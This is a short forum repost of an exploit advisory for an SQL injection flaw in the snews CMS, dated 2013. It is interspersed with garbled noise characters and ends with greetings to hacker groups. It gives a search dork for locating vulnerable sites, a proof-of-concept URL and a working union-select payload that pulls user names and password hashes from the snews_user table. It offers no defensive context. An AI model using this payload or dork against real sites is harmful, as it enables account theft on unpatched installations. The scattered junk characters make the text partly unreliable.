标题: CMS snews SQL Injection Vulnerability3 o+ k% _8 \% ?9 G' Q
作者: By onestree6 v2 C( w; I9 H
下载地址 : http://snewscms.com/
' q1 R0 D* l# }% P% l( j& }& ^测试平台 : ubuntu 12.10 / win 7# y' F3 y" K7 |, Y R" g
关键词: inurl:"tanyakan pada rumput yang bergoyang"
+ C( l, E9 V: P
; c! I8 r: N, I& E
$ z4 X: a1 e4 e* ?8 |- s p0 x*************************************************************
+ d B0 d5 ~8 o V/ G8 V1 |
/ P! A* O i& W0 U9 ?0 aSQL poc:
1 _- P0 f; X7 J3 U) d) O" T( v' u+ J
5 g7 g5 G- M6 ~# c& Uhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
2 w3 U7 G8 t5 I9 F6 D 4 i9 r* n" u0 k& F
示例
& x+ y2 y ?: }$ _
) p4 n- c( O3 U/ j ihttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
) J z+ B8 b- C5 \, ]! S5 X & J, } X" |0 z0 ~; @% |
4 n3 _3 Z4 k3 Z" Y
致谢:0 L1 f! Z$ b8 b. q
! P) s) M- {- E
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell3 G; y3 @' u, P; K4 G
$ A# D, _1 C7 F) ]& ^
indonesiancoder - moeslimh4x0r - go-coder
9 y3 N' H6 N3 n" y. T5 Y ! x! i3 X7 m. r- G% Z8 L7 P1 Z
spesial my hunny :*
/ M+ W6 p! S* g* {9 Y8 S |
发表于 2013-1-23 08:55:06
收藏
支持
反对